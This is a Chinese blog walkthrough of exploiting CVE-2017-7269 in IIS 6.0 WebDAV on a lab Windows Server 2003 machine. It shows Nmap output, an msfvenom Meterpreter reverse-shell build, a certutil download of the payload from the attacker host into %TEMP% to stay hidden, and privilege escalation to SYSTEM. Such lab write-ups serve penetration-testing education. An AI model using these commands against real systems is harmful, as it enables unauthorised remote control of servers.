IIS6远程代码执行漏洞复现3:原理详解+MSF反弹shell渗透实践(CVE-2017-7269)

目录

一、CVE-2017-7269漏洞

二、渗透准备

1、搭建环境

2、信息搜集

三、攻击者生成PoC

四、攻击者上传MSF POC文件

1、Kali开启http服务

2、使用Certutil命令上传到靶机

五、MSF反弹shell实战

1、普通权限

(1)执行MSF PoC

(2)反弹成功

2、管理员权限

(1)执行MSF PoC

(2)反弹成功


本文演示了利用CVE-2017-7269漏洞对Windows Server 2003 IIS6.0服务器进行渗透测试的全过程。攻击者首先通过Nmap扫描确认目标系统存在漏洞,随后使用msfvenom生成恶意可执行文件,并利用Certutil工具上传到靶机。通过普通权限和管理员权限分别执行PoC文件,最终成功获取Meterpreter反弹shell,其中管理员权限下可获得system级别控制权。整个渗透过程展示了从漏洞利用到权限提升的完整攻击链,凸显了该高危漏洞的严重性。

一、CVE-2017-7269漏洞

CVE-2017-7269 是微软 IIS 6.0 服务器上 WebDAV 服务存在的远程代码执行漏洞,主要影响运行 Windows Server 2003  的系统。该漏洞源于 WebDAV 服务对 PROPFIND 等 HTTP 请求的处理存在缺陷,攻击者可通过构造恶意的 HTTP 请求,向目标服务器注入精心设计的代码,进而执行任意命令,获得系统权限。

利用该漏洞无需认证,攻击者只需向目标 IIS 6.0 服务器的 WebDAV 服务发送特制请求,即可触发漏洞,实现远程代码执行。这使得漏洞危害较大,一旦被利用,可能导致服务器被完全控制,造成数据泄露、系统被篡改等严重后果。

二、渗透准备

1、搭建环境

本次渗透渗透测试环境由攻击机与靶机构成:攻击机为 IP 192.168.59.128 的 Kali Linux 系统,搭载 Metasploit、Nmap、msfvenom 等工具,作为主渗透测试平台;靶机为 IP 192.168.59.148 的 Windows Server 2003 系统,运行 IIS 6.0 及 WebDAV 服务,且存在 CVE-2017-7269 漏洞,该漏洞可让攻击者通过构造恶意 PROPFIND 请求远程执行代码,适合开展针对 IIS 6.0 WebDAV 服务的漏洞利用与渗透测试演练。

组件IP地址操作系统重要工具/服务备注
攻击机192.168.59.128Kali LinuxMetasploit, Nmap、msfvenom 主渗透测试平台
靶机192.168.59.148Windows Server 2003IIS 6.0, WebDAV存在CVE-2017-7269漏洞

2、信息搜集

使用 Nmap 工具对 IP 地址为 192.168.59.148 的目标主机进行全面扫描的命令。其中 -A 是 “全面扫描” 参数,会启用多种高级扫描功能,包括:探测目标主机开放的端口及服务、识别服务版本信息、检测操作系统类型及版本、运行默认脚本扫描(如漏洞探测、安全配置检查等)、获取主机名和网络信息等。执行后会生成目标的详细网络资产信息,如下所示。

nmap -A 192.168.59.148  

这份 Nmap 扫描结果显示,靶机 192.168.59.148 为运行 Windows Server 2003 SP2 的系统,主机名为 LJN-CA424032C9D,加入 WORKGROUP 工作组。开放端口中,80 端口运行 Microsoft IIS 6.0 服务器,支持 WebDAV 服务及 PROPFIND 等方法,存在 CVE-2017-7269 漏洞利用可能;135、139、445 等端口暴露 Windows RPC、SMB 服务,且 SMB 安全模式显示消息签名禁用。整体来看,靶机配置符合 CVE-2017-7269 漏洞环境特征,WebDAV 服务和开放端口为渗透测试提供了潜在入口。

┌──(kali㉿kali)-[/usr/…/modules/exploits/windows/iis]
└─$ nmap -A 192.168.59.148            
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-19 05:09 EDT
Nmap scan report for 192.168.59.148
Host is up (0.0039s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
|   Server Date: Fri, 19 Sep 2025 09:09:30 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|_  Server Type: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Error
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2003 3790 Service Pack 2 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: -4h00m27s, deviation: 5h39m23s, median: -8h00m27s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LJN-CA424032C9D, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:79:89:a3 (VMware)
| smb-os-discovery: 
|   OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
|   OS CPE: cpe:/o:microsoft:windows_server_2003::sp2
|   Computer name: ljn-ca424032c9d
|   NetBIOS computer name: LJN-CA424032C9D\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-09-19T17:09:30+08:00

三、攻击者生成PoC

本文实验是系列实验,当前已经实现nc反弹shell,接下来我们使用msfvenom生成一个 Windows 平台的 32 位恶意可执行文件 mooyuan.exe。当windows server 2003目标靶机运行此文件时,会主动向 192.168.59.128:4444 发起 TCP 连接,攻击者可通过 Metasploit 监听该端口,获取目标主机的 Meterpreter 交互式控制会话。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=4444 -f exe -a x86 --platform windows -o mooyuan.exe
  • -p windows/meterpreter/reverse_tcp

    指定使用的载荷(Payload):

    • windows:目标操作系统为 Windows
    • meterpreter:功能强大的交互式后门(支持命令执行、文件操作等)
    • reverse_tcp:反向 TCP 连接模式(目标机会主动连接攻击者的主机)
  • LHOST=192.168.59.128

    攻击者的 IP 地址(即恶意程序执行后会主动连接的主机 IP)。

  • LPORT=4444

    攻击者监听的端口(恶意程序会连接此端口建立通信)。

  • -f exe

    指定输出文件格式为 Windows 可执行文件(.exe)。

  • -a x86

    指定目标架构为 32 位(x86)。

  • --platform windows

    明确指定目标平台为 Windows。

  • -o mooyuan.exe

    指定输出的恶意文件名为 mooyuan.exe

四、攻击者上传MSF PoC文件

1、Kali开启http服务

在PoC文件所在的目录内/home/kali的路径中开启http服务,开启http服务的命令如下所示。

python -m http.server 8081

因此mooyuan.exe的URL地址为http://192.168.59.128:8081/mooyuan.exe  其中192.168.59.128为攻击机ip地址。

2、使用Certutil命令上传到靶机

在nc shell反弹环境向 192.168.59.128:8081 这个地址上传 mooyuan.exe 文件到当前执行命令的目录,并覆盖可能存在的同名文件。这里特别注意,需要我们把文件都下载到%TEMP%目录中,故而需要先使用cd %TEMP%进入到该文件夹中,具体如下所示。

cd %TEMP%
Certutil -urlcache -split -f http://192.168.59.128:8081/mooyuan.exe 
rename Blob0_0.bin mooyuan.exe
  • cd %TEMP%

    • %TEMP%是 Windows 系统的环境变量,指向当前用户的临时文件夹(通常为C:\Documents and Settings\用户名\Local Settings\TempC:\Users\用户名\AppData\Local\Temp)。
    • 该命令的作用是切换到临时目录,利用临时目录的可写性和隐蔽性进行后续操作,减少被发现的概率。
  • Certutil -urlcache -split -f http://192.168.59.128:8081/mooyuan.exe

    • 使用系统自带工具certutil从攻击机192.168.59.128:8081下载文件mooyuan.exe到当前的临时目录。
    • 参数-urlcache处理 URL 缓存,-split强制文件保存到当前目录(而非系统缓存路径),-f确保覆盖已有文件。
    • 特殊情况:部分系统中,certutil可能将下载文件默认命名为Blob0_0.bin(缓存文件格式),而非预期的mooyuan.exe
  • rename Blob0_0.bin mooyuan.exe

    • 若上一步下载的文件被自动命名为Blob0_0.bin,通过rename命令将其重命名为mooyuan.exe,恢复可执行文件格式。
    • 目的是使文件能以可执行程序(.exe)的形式运行,为后续执行恶意代码或漏洞利用工具做准备。

五、MSF反弹shell实战

1、普通权限

(1)执行MSF PoC

在nc的反弹shell中执行MSF恶意文件mooyuan.exe,如下所示。

cd %TEMP%
mooyuan.exe

由于普通权限执行mooyuan.exe经常导致MSF反弹无法成功,故而我这里执行多次,才能在Kali中反弹成功。

(2)反弹成功

如下所示,msf已经成功建立连接,通过getuid获取到当前用户为普通账户。

2、管理员权限

本文是系列文章,当前将提权工具iis6.exe上传到靶机中。

(1)执行MSF PoC

在nc的反弹shell中通过iis6.exe使用管理员权限执行MSF恶意文件mooyuan.exe,如下所示。

iis6.exe "mooyuan.exe"

(2)反弹成功

如下所示,msf已经成功建立连接,通过getuid获取到当前用户为管理员system权限。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值